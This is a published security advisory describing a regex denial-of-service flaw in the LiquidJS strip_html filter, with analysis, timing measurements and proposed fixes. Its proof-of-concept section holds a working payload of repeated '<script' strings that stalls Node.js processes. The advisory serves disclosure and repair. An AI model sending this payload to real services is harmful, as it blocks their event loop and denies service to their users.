LiquidJS Vulnerable to ReDoS via Quadratic Backtracking in `strip_html` Filter Regex

Summary

The built-in strip_html filter in liquidjs uses a regex containing four lazy-quantified alternatives. When the input contains many <script, <style, or <!-- opener tokens without matching closers, the V8 regex engine performs O(N²) backtracking, blocking the Node.js event loop. A single ~350 KB request ('<script'.repeat(50000)) stalls the process for ~10 seconds, and cost grows quadratically with input size. The default memoryLimit: Infinity does not bound regex CPU, and even when a limit is configured, strip_html only charges str.length against it; the regex itself runs unbounded.

Details

The vulnerable filter is at src/filters/html.ts:45-49:

export function strip_html (this: FilterImpl, v: string) {
  const str = stringify(v)
  this.context.memoryLimit.use(str.length)
  return str.replace(/<script[\s\S]*?<\/script>|<style[\s\S]*?<\/style>|<.*?>|<!--[\s\S]*?-->/g, '')
}

The regex contains four lazy patterns:

<script[\s\S]*?<\/script>
<style[\s\S]*?<\/style>
<.*?>
<!--[\s\S]*?-->

For an input like '<script'.repeat(N), the engine encounters N starting < positions. At each one it must lazily expand [\s\S]*? (and .*?) all the way to end-of-input searching for a closer that never appears, then fail and backtrack. Because each of the O(N) starts performs O(N) lazy-expansion work, total work is O(N²).
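
The quadratic bound can be made explicit with a short count. As a simplifying assumption (not a measured model of V8), suppose a failed attempt starting at the k-th opener costs time proportional to the length of the remaining input, with a constant c that absorbs the work of the individual alternatives:

```latex
% Input: '<script' repeated N times, so the k-th opener (k = 0, ..., N-1)
% sits at offset 7k and has 7(N - k) characters from there to end-of-input.
T(N) \;\approx\; \sum_{k=0}^{N-1} c \cdot 7\,(N - k)
      \;=\; 7c \cdot \frac{N(N+1)}{2}
      \;=\; \Theta(N^2)
```

Under this count, doubling N roughly quadruples the cost.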

Reachability:

strip_html is a default-registered filter (exported from src/filters/html.ts, wired up via src/filters/index.ts), invocable from any template via {{ x | strip_html }}.
The filter calls String.prototype.replace with the vulnerable regex directly on the caller-supplied string, with no length cap and no timeout.
The default memoryLimit is Infinity (src/liquid-options.ts:198); the filter only charges str.length against memory (line 47), which does not bound CPU work for regex backtracking.

This is distinct from GHSA-45rm-2893-5f49 (prototype property leak, CWE-200) and from any prior replace/strip_html issues — the mechanism here is regex backtracking CPU consumption on a different filter.

PoC

Empirical scaling confirmed against a freshly built liquidjs@10.25.7 bundle on Node 22 / Linux:

node -e "
const { Liquid } = require('liquidjs');
const e = new Liquid();
(async () => {
  for (const n of [1000, 2000, 4000, 8000, 16000]) {
    const payload = '<script'.repeat(n);
    const t0 = Date.now();
    await e.parseAndRender('{{ x | strip_html }}', { x: payload });
    console.log('n=' + n + ' inputLen=' + payload.length + ' ms=' + (Date.now() - t0));
  }
})();
"

Verified output:

n=1000  inputLen=7000   ms=5
n=2000  inputLen=14000  ms=12     (2.4x for 2x size)
n=4000  inputLen=28000  ms=46     (3.8x for 2x size)
n=8000  inputLen=56000  ms=187    (4.0x for 2x size)
n=16000 inputLen=112000 ms=737    (3.9x for 2x size)
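
The ratios in parentheses can be turned into an empirical growth exponent, log(time ratio) / log(size ratio), where a value near 2 indicates quadratic scaling. The sketch below only reuses the five measurements listed above; the helper name growthExponents is illustrative.

```javascript
// Measurements copied from the verified output above.
const rows = [
  { n: 1000, ms: 5 },
  { n: 2000, ms: 12 },
  { n: 4000, ms: 46 },
  { n: 8000, ms: 187 },
  { n: 16000, ms: 737 },
];

// For each consecutive pair, estimate p in time ~ n^p.
function growthExponents(data) {
  const exponents = [];
  for (let i = 1; i < data.length; i++) {
    const sizeRatio = data[i].n / data[i - 1].n;
    const timeRatio = data[i].ms / data[i - 1].ms;
    exponents.push(Math.log(timeRatio) / Math.log(sizeRatio));
  }
  return exponents;
}

console.log(growthExponents(rows).map((e) => e.toFixed(2)).join(' '));
// prints "1.26 1.94 2.02 1.98"
```

The first pair is dominated by fixed overhead at a 5 ms runtime; from n=2000 onward the exponent settles close to 2.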

A larger payload extrapolates straightforwardly:

node -e "
const { Liquid } = require('liquidjs');
const e = new Liquid();
(async () => {
  const payload = '<script'.repeat(50000);  // 350 KB
  const t0 = Date.now();
  await e.parseAndRender('{{ x | strip_html }}', { x: payload });
  console.log('elapsed ms:', Date.now() - t0);
})();
"
# elapsed ms: ~10000+ (Node single-threaded event loop fully blocked)

The same pathology applies to <style and <!-- openers.

Impact

Single-request DoS: A 350 KB request body stalls the Node.js event loop for ~10 seconds; 700 KB takes ~40 s; 1.4 MB takes ~160 s. All other requests on the process queue behind the regex.
Trivial amplification: Quadratic scaling means small attacker bandwidth produces large server CPU consumption. A handful of concurrent requests fully saturates the worker.
No authentication required: The typical use case for strip_html is sanitizing untrusted input (comments, posts, profile bios, product descriptions). Any endpoint that renders user content through strip_html is exposed.
memoryLimit doesn't help: Even applications that opt into memoryLimit are not protected, because (a) the regex CPU runs to completion before any output is produced, and (b) only str.length is charged, not the cost of the regex traversal.

Recommended Fix

Replace the backtracking regex with an atomic / non-overlapping pattern, and/or perform a single linear pass.

Option 1 — anchor each alternative so lazy expansion fails fast on chunked content (no [\s\S]*? over the full tail):

return str.replace(
  /<script\b[^<]*(?:<(?!\/script>)[^<]*)*<\/script>|<style\b[^<]*(?:<(?!\/style>)[^<]*)*<\/style>|<!--[^-]*(?:-(?!->)[^-]*)*-->|<[^>]*>/g,
  ''
)

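This unrolls each lazy quantifier, so a single match attempt consumes its input without nested backtracking. Unrolling does not reduce the number of attempts, however: when no closer exists, every < still starts a scan that can run to end-of-input, so '<script'.repeat(N) remains quadratic under this pattern, only with a smaller constant factor. Re-run the PoC payload against any candidate regex before treating it as linear.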
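
A candidate pattern can be checked against the original before it is adopted. The sketch below compares the two regexes on a few well-formed inputs and provides a timer for re-running the '<script' payload against each. The helper names (strip, agreeOnSamples, timeMs) are illustrative and not part of liquidjs, and no timings are claimed here.

```javascript
// Original pattern from src/filters/html.ts, as quoted in Details.
const ORIGINAL = /<script[\s\S]*?<\/script>|<style[\s\S]*?<\/style>|<.*?>|<!--[\s\S]*?-->/g;
// Option 1 pattern, copied verbatim from the proposal above.
const UNROLLED = /<script\b[^<]*(?:<(?!\/script>)[^<]*)*<\/script>|<style\b[^<]*(?:<(?!\/style>)[^<]*)*<\/style>|<!--[^-]*(?:-(?!->)[^-]*)*-->|<[^>]*>/g;

function strip(re, s) {
  return s.replace(re, '');
}

// True when both patterns produce identical output for every sample.
function agreeOnSamples(samples) {
  return samples.every((s) => strip(ORIGINAL, s) === strip(UNROLLED, s));
}

// Wall-clock time for one replace() over n unterminated openers.
function timeMs(re, n) {
  const payload = '<script'.repeat(n);
  const t0 = performance.now();
  strip(re, payload);
  return performance.now() - t0;
}

const samples = [
  'a<b>c</b>d',
  'x<script>alert(1)</script>y',
  '<style>p{}</style>t',
  'a<!-- c -->b',
];
console.log('agree on samples:', agreeOnSamples(samples));
for (const n of [1000, 2000, 4000]) {
  console.log('n=' + n,
    'original ms=' + timeMs(ORIGINAL, n).toFixed(1),
    'unrolled ms=' + timeMs(UNROLLED, n).toFixed(1));
}
```

The two patterns are not strictly equivalent: `[^>]*` matches line terminators while `.*?` does not, so a tag that spans a line break is stripped by the Option 1 pattern but left in place by the original.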

Option 2 — single-pass tokenizer in plain code; iterate over the string once, tracking whether you are inside <script>, <style>, comment, or generic tag, and emit nothing for those ranges.
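
A minimal sketch of such a single-pass stripper follows, assuming a hypothetical helper named stripHtmlLinear that is not part of liquidjs. It uses indexOf to jump to the closer for each opener and remembers when a closer is absent from the rest of the input, so an unterminated opener costs at most one full scan per closer type. It approximates the regex rather than reproducing it byte for byte: comments are recognised before generic tags, and tags may span line breaks.

```javascript
// Hypothetical helper, not part of liquidjs: strips tags in one forward pass.
function stripHtmlLinear(str) {
  // Closers already known to be absent from the remainder of the input.
  const absent = new Set();

  // Find `closer` at or after `from`; record a miss so it is never rescanned.
  const findCloser = (closer, from) => {
    if (absent.has(closer)) return -1;
    const at = str.indexOf(closer, from);
    if (at === -1) absent.add(closer);
    return at;
  };

  let out = '';
  let i = 0;
  while (i < str.length) {
    const lt = str.indexOf('<', i);
    if (lt === -1) {
      out += str.slice(i);
      break;
    }
    out += str.slice(i, lt);

    // Pick the closer that matches the opener at `lt` (case-sensitive,
    // like the original regex).
    let closer = '>';
    if (str.startsWith('<!--', lt)) closer = '-->';
    else if (str.startsWith('<script', lt)) closer = '</script>';
    else if (str.startsWith('<style', lt)) closer = '</style>';

    let end = findCloser(closer, lt + 1);
    if (end === -1 && closer !== '>') {
      // No specific closer: fall back to treating it as a generic tag.
      closer = '>';
      end = findCloser(closer, lt + 1);
    }
    if (end === -1) {
      // Unterminated '<': keep it as literal text and move on.
      out += '<';
      i = lt + 1;
    } else {
      i = end + closer.length;
    }
  }
  return out;
}

console.log(stripHtmlLinear('x<script>alert(1)</script>y')); // prints "xy"
console.log(stripHtmlLinear('1 < 2'));                       // prints "1 < 2"
```

Every successful search advances the cursor past the text it scanned, and every failed search is recorded, so total work stays proportional to the input length even for '<script'.repeat(N).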

Either fix should be combined with charging the regex output cost honestly to memoryLimit and (defensively) capping input length up front:

export function strip_html (this: FilterImpl, v: string) {
  const str = stringify(v)
  this.context.memoryLimit.use(str.length)
  // ... linear-time strip implementation here
}
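
The up-front length cap mentioned above could look like the following sketch. The constant MAX_STRIP_HTML_INPUT and the wrapper withInputCap are hypothetical names chosen for illustration; liquidjs does not define them, and the cap value is an arbitrary placeholder.

```javascript
// Hypothetical cap; liquidjs does not define this constant.
const MAX_STRIP_HTML_INPUT = 100000;

// Wraps any strip function so oversized input is rejected before any
// pattern matching runs.
function withInputCap(strip, maxLen = MAX_STRIP_HTML_INPUT) {
  return function cappedStrip(value) {
    const str = String(value);
    if (str.length > maxLen) {
      throw new RangeError(
        'strip_html input of ' + str.length + ' chars exceeds cap of ' + maxLen
      );
    }
    return strip(str);
  };
}

// Usage with a deliberately tiny cap of 10 characters.
const capped = withInputCap((s) => s.replace(/<[^>]*>/g, ''), 10);
console.log(capped('<b>hi</b>')); // prints "hi"
```

Rejecting the input outright, rather than truncating it, avoids silently emitting half-stripped markup; a cap bounds the worst case but does not remove the quadratic behaviour below the cap.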

References

harttle published to harttle/liquidjs May 24, 2026

Published to the GitHub Advisory Database May 27, 2026

Reviewed May 27, 2026

Weaknesses

Inefficient Regular Expression Complexity
